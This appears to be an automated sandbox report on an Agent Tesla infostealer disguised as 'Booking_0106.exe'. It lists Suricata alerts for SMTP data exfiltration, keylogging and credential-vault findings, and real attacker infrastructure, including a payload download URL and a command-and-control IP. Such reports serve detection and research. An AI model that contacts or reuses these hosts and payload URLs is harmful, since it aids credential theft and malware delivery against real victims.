Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05755C65h	3_2_057558C8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05755C65h	3_2_057558B8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	8_2_0533D838
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05363BC1h	8_2_05363D27
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05363BC1h	8_2_05363B84
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05363BC1h	8_2_05363A7F
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05363BC1h	8_2_05363A88
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	8_2_05362AD0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	8_2_05362AC8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 053764BAh	8_2_05376438
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 053764BAh	8_2_05376428
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 0537E0C8h	8_2_0537E010
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 0537E0C8h	8_2_0537E009
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05375C65h	8_2_053758B8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 05375C65h	8_2_053758C8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4x nop then jmp 053764BAh	8_2_053763BF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49733 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49733 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49744 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49735 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49744 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49744 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49733 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49733 -> 162.254.34.31:587

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 162.254.34.31:587

Source: global traffic	HTTP traffic detected: GET /3y/doci.exe HTTP/1.1Host: 172.86.66.70Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3y/doci.exe HTTP/1.1Host: 172.86.66.70Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 162.254.34.31 162.254.34.31
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 162.254.34.31:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.66.70

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3y/doci.exe HTTP/1.1Host: 172.86.66.70Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3y/doci.exe HTTP/1.1Host: 172.86.66.70Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: doc-d.exe, 00000001.00000002.2274873731.0000000002740000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.86.66.70
Source: doc-d.exe, 00000001.00000002.2274873731.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.86.66.70/3y/doci.exe
Source: doc-d.exe, 00000001.00000002.2274873731.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.86.66.70/3y/doci.exeP
Source: doc-d.exe, 00000001.00000002.2274873731.0000000002760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.86.66.70D
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ibrzb.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Booking_0106.exe, 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, doc-d.exe, 00000001.00000002.2274873731.0000000002740000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000002.00000002.2962867895.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2963837882.000000000293C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2962339297.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr	String found in binary or memory: http://upx.sf.net
Source: Booking_0106.exe, ibrzb.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Booking_0106.exe, 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000002.00000002.2962867895.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2963837882.000000000293C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2962339297.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2956507018.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Booking_0106.exe, 00000002.00000002.2962867895.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2963837882.000000000293C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2962339297.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Booking_0106.exe, 00000002.00000002.2962867895.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2963837882.000000000293C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000009.00000002.2962339297.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1860595273.0000000003DE2000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1939658739.0000000003B22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Booking_0106.exe, 00000000.00000002.1729847882.00000000040C1000.00000004.00000800.00020000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1731604116.00000000058F0000.00000004.08000000.00040000.00000000.sdmp, Booking_0106.exe, 00000000.00000002.1729847882.000000000419C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, SKTzxzsJw.cs

.Net Code: nUAqbab

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Booking_0106.exe.4023d90.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Booking_0106.exe.4023d90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A210D8 NtResumeThread,	0_2_05A210D8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A210D1 NtResumeThread,	0_2_05A210D1
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3F510 NtProtectVirtualMemory,	0_2_05A3F510
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3F50A NtProtectVirtualMemory,	0_2_05A3F50A
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_057410D8 NtResumeThread,	3_2_057410D8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05741047 NtResumeThread,	3_2_05741047
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_057410D1 NtResumeThread,	3_2_057410D1
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575F510 NtProtectVirtualMemory,	3_2_0575F510
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_0575F50B NtProtectVirtualMemory,	3_2_0575F50B
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_053610D8 NtResumeThread,	8_2_053610D8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_053610D1 NtResumeThread,	8_2_053610D1
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537F510 NtProtectVirtualMemory,	8_2_0537F510
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0537F50A NtProtectVirtualMemory,	8_2_0537F50A

Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_0143A2A2	0_2_0143A2A2
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_014335B8	0_2_014335B8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_014317A8	0_2_014317A8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_0143B69C	0_2_0143B69C
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01430BB0	0_2_01430BB0
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01437C08	0_2_01437C08
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01430E88	0_2_01430E88
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_014321A1	0_2_014321A1
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_014320F1	0_2_014320F1
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_014335AA	0_2_014335AA
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01434420	0_2_01434420
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01432428	0_2_01432428
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_0143E858	0_2_0143E858
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_014318A6	0_2_014318A6
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01430F39	0_2_01430F39
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01430E78	0_2_01430E78
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_01430EC2	0_2_01430EC2
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_057B0048	0_2_057B0048
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_057B0001	0_2_057B0001
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05957098	0_2_05957098
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05956308	0_2_05956308
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_0595BD65	0_2_0595BD65
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05955790	0_2_05955790
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05955780	0_2_05955780
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05957601	0_2_05957601
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05950006	0_2_05950006
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05950040	0_2_05950040
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05957380	0_2_05957380
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_059562F8	0_2_059562F8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_059E2134	0_2_059E2134
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_059E2467	0_2_059E2467
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_059E3748	0_2_059E3748
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_059FF140	0_2_059FF140
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_059F0006	0_2_059F0006
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_059F0040	0_2_059F0040
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2CD98	0_2_05A2CD98
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A22EE9	0_2_05A22EE9
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2A6C8	0_2_05A2A6C8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2D920	0_2_05A2D920
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2C0A8	0_2_05A2C0A8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2CD88	0_2_05A2CD88
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A23D27	0_2_05A23D27
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2A6B8	0_2_05A2A6B8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2CEF3	0_2_05A2CEF3
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A2D910	0_2_05A2D910
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A23B84	0_2_05A23B84
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A23A88	0_2_05A23A88
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A23A7A	0_2_05A23A7A
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A37F78	0_2_05A37F78
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3C748	0_2_05A3C748
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A373B0	0_2_05A373B0
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3D3D8	0_2_05A3D3D8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3F2A8	0_2_05A3F2A8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3C73A	0_2_05A3C73A
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A37F69	0_2_05A37F69
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3D66E	0_2_05A3D66E
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A39978	0_2_05A39978
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A39950	0_2_05A39950
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A373A0	0_2_05A373A0
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A323F8	0_2_05A323F8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3D3C8	0_2_05A3D3C8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05A3F298	0_2_05A3F298
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05C7D1A0	0_2_05C7D1A0
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05C7F038	0_2_05C7F038
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A11080	1_2_00A11080
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A10DA8	1_2_00A10DA8
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A122C0	1_2_00A122C0
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A110BA	1_2_00A110BA
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A11071	1_2_00A11071
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A11983	1_2_00A11983
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A125F8	1_2_00A125F8
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A11131	1_2_00A11131
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A11A81	1_2_00A11A81
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Code function: 1_2_00A12371	1_2_00A12371
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_02E841C8	2_2_02E841C8
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_02E8E508	2_2_02E8E508
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_02E84A98	2_2_02E84A98
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_02E8AA12	2_2_02E8AA12
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_02E8D990	2_2_02E8D990
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_02E83E80	2_2_02E83E80
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BCA198	2_2_06BCA198
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BCBC48	2_2_06BCBC48
